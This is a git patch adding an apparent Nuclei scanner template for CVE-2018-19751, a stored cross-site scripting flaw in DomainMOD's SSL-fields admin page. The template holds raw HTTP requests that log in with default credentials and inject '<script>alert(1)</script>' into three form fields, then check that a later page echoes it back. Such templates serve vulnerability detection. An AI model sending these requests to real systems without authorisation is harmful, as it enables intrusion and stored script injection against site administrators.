From 90fddf682cecf339a8dc255f71f6aa4289035692 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Fri, 8 Jul 2022 01:33:32 +0530
Subject: [PATCH] Create CVE-2018-19751.yaml

---
 CVE-2018-19751.yaml | 61 +++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 CVE-2018-19751.yaml

diff --git a/CVE-2018-19751.yaml b/CVE-2018-19751.yaml
new file mode 100644
index 0000000000..3b6c167aaa
--- /dev/null
+++ b/CVE-2018-19751.yaml
@@ -0,0 +1,61 @@
+id: CVE-2018-19751
+
+info:
+  name: DomainMOD 4.11.01 - '/admin/ssl-fields/add.php' Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
+    - https://www.exploit-db.com/exploits/45947/
+    
+  metadata:
+    verified: true
+  tags: wbcecms,xss
+
+requests:
+  - raw:
+
+      - |
+        POST /domain/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+       
+        new_username=admin&new_password=admin123
+
+      - |
+        POST /domain/admin/ssl-fields/add.php HTTP/1.1
+        Host: {{Hostname}}    
+        Content-Type: application/x-www-form-urlencoded
+        Origin: https://{{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+
+        new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+
+      - |
+        GET /domain/assets/categories.php HTTP/1.1
+        Host: {{Hostname}}    
+        Content-Type: application/x-www-form-urlencoded
+
+
+    cookie-reuse: true           
+    matchers-condition: and
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(1)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file